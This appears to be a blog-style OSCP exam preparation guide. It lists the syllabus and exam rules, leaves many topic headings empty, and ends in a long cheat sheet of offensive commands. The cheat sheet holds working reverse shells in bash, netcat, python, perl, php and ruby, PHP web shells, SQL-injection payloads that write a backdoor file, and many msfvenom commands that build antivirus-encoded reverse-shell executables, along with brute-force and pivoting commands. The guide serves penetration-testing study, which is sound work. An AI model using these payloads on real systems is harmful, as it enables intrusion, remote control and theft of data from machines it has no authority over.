WHAT IS OSCP ?
The Offensive Security Certified Professional is one of the most technical and most challenging certifications for information security professionals.
In order to become certified you must complete the Penetration Testing with Kali Linux (PwK) course and pass a “24 hour” hands-on exam and you have 24 hours to write a report.
Official Link : PEN-200 | PENETRATION TESTING COURSE & CERTIFICATION
OSCP SYLLABUS
- Getting Comfortable with Kali Linux
- Command Line Fun
- Practical Tools
- Bash Scripting
- Passive Information Gathering
- Active Information Gathering
- Vulnerability Scanning
- Web Application Attacks
- Buffer Overflows
- Client-Side Attacks
- Locating Public Exploits
- Fixing Exploits
- File Transfers
- Antivirus Evasion
- Privilege Escalation
- Password Attacks
- Port Redirection and Tunneling
- Active Directory Attacks
- The Metasploit Framework
- PowerShell Empire
- Penetration Test Breakdown
PREREQUISITES
Before you decide to register for the course you need to have some experience in the following areas :
- Linux Fundamentals : File System, Command Line etc.
- Networking Fundamentals : TCP/IP, Protocols etc.
- Programming Languages : Bash and Python
- Note Taking : Cherry Tree, KeepNote
EXAM DETAILS
- You will have a total of 23 hours and 45 mins for the exam.
- You will be proctored during your exam. Webcam and screen sharing software are required.
- The exam will consist of 5 target systems that are vulnerable and can be compromised.
- You will need a minimum of 70 points or higher to pass.
- If you believe you have enough points you will have another 24 hours to write your report.
- An extra 5 points will be given if you are able to complete the lab report and the course exercises.
Restrictions :
You cannot use any of the following on the exam :
- Spoofing (IP, ARP, DNS, NBNS, etc)
- Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
- Automatic exploitation tools (e.g, browser_autopwn, SQLmap, SQLninja, jsql etc.)
- Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)
Exam Tips :
- Enumeration is the most important thing you can do.
- Prepare your cheat sheets, notes, tools, and exploits.
- Note Everything.
- Keep Patience, Believe in yourself and Everything will be done easily !!!
LAB SETUP
GETTING STARTED WITH KALI LINUX
COMMAND LINE FUN
- Netcat
- PowerShell
- Wireshark
- Tcpdump
Kali Linux Tools : https://tools.kali.org/tools-listing
BASH SCRIPTING
In Passive Information Gathering process we are collecting information about the targets using publicly available information.
In Active Information Gathering we can gather more information about these targets by actively interacting with them. for example; Port Scanning, OS Fingerprinting, DNS, SMB, NFS, SMTP, and SNMP enumeration.
VULNERABILITY SCANNING
WEB APPLICATION ATTACKS
- Web Application Enumeration : View page source-code, check well known files (robots.Txt, security.txt, .git, readme.md, sitemap.xml etc.), find some files and directories, brute force login pages, check subdomains, find open ports and what web technologies target website is using etc.
- Burp Suite
- OWASP Top Ten
- The Web Application Hacker's Handbook
BUFFER OVERFLOWS
CLIENT-SIDE ATTACKS
LOCATING PUBLIC EXPLOITS
FIXING EXPLOITS
Generating our own payload
FILE TRANSFERS
ANTIVIRUS EVASION
PRIVILEGE ESCALATION
Payload :
Linux :
Windows :
PASSWORD ATTACKS
Offline Password Cracking :
Online Password Cracking :
Wordlist Generators :
Wordlist :
Online Password Hash Cracker :
PORT REDIRECTION AND TUNNELING
ACTIVE DIRECTORY ATTACKS
POWERSHELL EMPIRE
PENETRATION TEST BREAKDOWN
Resource will be updated soon.
HELPFUL COMMANDS
SANS Cheat Sheets :
NMAP :
nmap -sC -sV -vv -oA quick 10.10.10.10
nmap -sU -sV -vv -oA quick_udp 10.10.10.10
nmap -sC -sV -p- -vv -oA full 10.10.10.10
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --maxretries 0 -p $x 10.10.10.10; done
WEB SCANNING :
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
nikto -h 10.10.10.10
wpscan -u 10.10.10.10/wp/
PORT CHECKING :
nc -v 10.10.10.10 port
telnet 10.10.10.10 port
NETCAT :
Download Netcat for Windows : http://bit.ly/netcat_exe
nc 10.10.10.10 1234 < file.zip
nc -l -p 1234 > file.zip
FILE TRANSFER :
Python -m SimpleHTTPServer 80
Python3 -m http.server 80
wget 10.10.10.10/file
powershell -c "(new-objectSystem.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
python -m pyftpdlib -p 21 -w
echo open 10.10.10.10/file.txt > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
atftpd --daemon --port 69 /tftp
tftp -i 10.10.10.10 GET nc.exe
SSH :
ssh [email protected]
ssh -i id_rsa [email protected]
ssh-keygen
chmod 644 id_rsa.pub
chmod 600 id_rsa
wget https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py
cp sshng2john.py /opt/JohnTheRipper/run/
python /opt/JohnTheRipper/run/sshng2john.py id_rsa > USERHASH
john --wordlist=/usr/share/wordlists/rockyou.txt USERHASH
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
SSH TUNNELING / PIVOTING :
shuttle -vvr [email protected] 10.0.0.1/24
ssh gateway -L local-port-to-listen:10.10.10.10:remote-port
ssh gateway -R remote-port-to-bind:127.0.0.1:local-port
ssh -D local-proxy-port -p remote-port 10.10.10.10
plink -l root -pw pass -R 3389:127.0.0.1:3389 10.10.10.10
SMB :
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vulnms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
enum4linux -a 10.10.10.10
rpcclient -U "" 10.10.10.10
smbclient //MOUNT/share
SNMP :
snmp-check 10.10.10.10
REVERSE SHELL :
bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
nc -e /bin/sh 10.10.10.10 4443
nc -e cmd.exe 10.10.10.10 4443
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect (("10.10.10.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="10.10.10.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) ;if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10
php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
xterm -display 10.10.10.10:1
Xnest :1
xhost +10.10.10.10
PHP :
< ?php echo system($_GET["cmd"]);?>
< ?php echo shell_exec($_GET["cmd"]);?>
POWERSHELL :
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
SQL INJECTION :
sqlmap -u http://10.10.10.10 --crawl=1
sqlmap -u http://10.10.10.10 --dbms=mysql --dump
sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell
union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
BRUTE FORCE :
shadow > unshadow.db
john unshadow.db
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
hashcat -m 500 -a 0 hash.txt rockyou.txt --username
hashcat -m 1600 -a 0 hash.txt rockyou.txt
hashcat -m 100 -a 0 hash.txt rockyou.txt --force
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
ncrack -vv --user offsec -P passwords rdp://10.10.10.10
hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
MSFVENOM PAYLOADS :
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windowsbinaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
SHELL SPAWNING :
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo $TERM
stty -a
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
exec "/bin/sh"
os.execute('/bin/sh')
exec "/bin/sh"
:!bash
:set shell=/bin/bash:shell
!sh
PRACTICE LABS
VulnHub :
HackTheBox :
MORE RESOURCES
More learning resources will be added soon...